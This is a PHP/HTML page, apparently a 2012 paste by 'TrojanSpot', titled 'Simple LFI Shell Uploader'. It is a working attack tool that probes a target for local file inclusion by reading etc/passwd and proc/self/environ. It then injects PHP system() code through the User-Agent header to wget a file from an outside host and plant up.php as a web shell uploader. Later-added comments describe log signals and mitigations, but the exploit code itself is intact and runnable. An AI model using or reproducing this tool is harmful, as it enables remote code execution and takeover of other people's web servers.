TrojanSpot

Simple LFI Shell Uploader | www.pemula.info

Sep 20th, 2012
  1. <html>
  2. <head><title>Simple LFI Shell Uploader</title>
  3. <style type="text/css">
  4. body {
  5. background-color: #000000;
  6. font-family:"Courier New";
  7. color: silver;
  8. font-size:11px;
  9. }
  10. input {
  11. background-color: #000000;
  12. font-family:"Courier New";
  13. color: silver;
  14. font-size:11px;
  15. border:1px solid;
  16. border-color:silver;
  17. }
  18. </style>
  19. </head>
  20. <body><h3>Simple LFI Sh3ll Uploader</h3>
  21. <form method="post" action="">
  22. LFI URL: <input type="text" size="60" name="lfiurl" value="">
  23. <input type="submit" value="j00$ !!!">
  24. </form>
  25. <?php
  // Defensive annotation: this block is the tool's whole attack flow; the code lines are unchanged.
  // On a POST carrying `lfiurl` it sends, in order, to the host named in that URL:
  //   1. a GET with a long ../ run ending in etc/passwd%00, checked for "root:x:0:0";
  //   2. a GET with the same traversal ending in proc/self/environ%00, checked for "DOCUMENT_ROOT=";
  //   3. a raw HTTP/1.0 GET to the same include path whose User-Agent header is PHP source calling system();
  //   4. a GET for up.php in the vulnerable script's directory, checked for the marker "trojanspot Was Here".
  // Log signals on the targeted server: request URIs containing repeated ../, %00, etc/passwd or
  // proc/self/environ; a User-Agent value beginning with "<?php"; the web server account running wget;
  // an unexpected up.php in the application directory.
  // Mitigations: never build an include/require path from request data (map the parameter to a fixed
  // allow-list of files), confine PHP with open_basedir, list system() and similar functions in
  // disable_functions where the application does not need them, and filter outbound traffic from web servers.
  // NOTE(review): the %00 suffix presumably truncates an extension the vulnerable include appends;
  // PHP has rejected NUL bytes in filesystem paths since 5.3.4, so that step depends on an older runtime.
  26. if($_POST['lfiurl']) {
  27. print "<pre>";
  28. $target = $_POST['lfiurl'];
  // Probe suffixes appended to the submitted URL (steps 1 and 2).
  29. $testlfi = "../../../../../../../../../../../../../../../etc/passwd%00";
  30. $readenv = "../../../../../../../../../../../../../../../proc/self/environ%00";
  // Split the submitted URL into host ($pecah[2]), directory ($path) and script name plus trailing
  // text ($bug); the indexing assumes a scheme://host/... form.
  31. $mbooh = preg_split("/.php/", $target);
  32. $pecah = preg_split("/\//", $mbooh[0]);
  33. $path = "/";
  34. $azz = count($pecah) - 1;
  35. for($g = 3; $g<$azz;$g++) {
  36. $path.= $pecah[$g]."/";
  37. }
  38. $bug = $pecah[$azz].".php".$mbooh[1];
  39. $host = $pecah[2];
  40. print "[+] Testing LFI ... ";
  41. flush();
  42. $res = FetchURL($target.$testlfi);
  43. if(preg_match("/root:x:0:0/", $res)) {
  44. print "<font color='green'>Ok</font><br>[+] Reading /proc/self/environ ... ";
  45. flush();
  46. $rez = FetchURL($target.$readenv);
  47. if(preg_match("/DOCUMENT_ROOT=/", $rez)) {
  48. print "<font color='green'>Ok</font><br>[+] Exploiting target ... <br>";
  49. flush();
  // Step 3 payload: PHP source carried in the User-Agent header. A header value that contains PHP
  // tags is never legitimate browser traffic and can be alerted on or blocked at the edge.
  50. $cmd = "<?php system('wget htt://www.neelsoftech.com/up.txt -O up.php');?>";
  // The request is written to port 80 and the socket is closed without reading the reply.
  51. $soket = fsockopen($host, 80);
  52. $req = "GET ".$path.$bug.$readenv." HTTP/1.0\r\nHost: ".$host."\r\nAccept: */*\r\nUser-Agent: ".$cmd."\r\n\r\n";
  53. fputs($soket, $req);
  54. fclose($soket);
  55. flush();
  // Step 4: the tool judges success by fetching up.php and matching the marker string below.
  56. $cek = FetchURL("http://".$host.$path."up.php");
  57. if(preg_match("/trojanspot Was Here/", $cek)) {
  58. print "[+] Exploit successful!<br>[+] Shell uploader to <font color='green'>http://".$host.$path."up.php</font>";
  59. } else {
  60. print "<font color='red'>[!] Exploit failed!</font><br>";
  61. }
  62. }
  63. else {
  64. print "<font color='red'>Failed</font><br>";
  65. }
  66. } else {
  67. print "<font color='red'>Failed</font><br>";
  68. }
  69. }
  /**
   * Fetch a URL with cURL and return the raw response, headers included.
   *
   * Redirects are followed and the transfer is capped at 30 seconds. Every request carries the
   * same hard-coded User-Agent string set below; on the receiving side that fixed value is a
   * usable access-log signature for the requests this helper sends.
   *
   * @param string $url Address to request.
   * @return string|false Response headers and body, or false when curl_exec() yields a falsy value.
   */
  function FetchURL($url) {
      $handle = curl_init();
      curl_setopt_array($handle, array(
          CURLOPT_USERAGENT => "Mozilla/3.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)",
          CURLOPT_FOLLOWLOCATION => 1,
          // Keep the response headers in the returned string.
          CURLOPT_HEADER => 1,
          CURLOPT_URL => $url,
          // Return the transfer instead of printing it.
          CURLOPT_RETURNTRANSFER => 1,
          CURLOPT_TIMEOUT => 30,
      ));
      $response = curl_exec($handle);
      return $response ? $response : false;
  }
  84. ?>
  85. <br>
  86. Copyleft &copy; 2011 by TrojanSpot!! [Atjeh Cyber Team'S]
  87. </body>
  88. </html>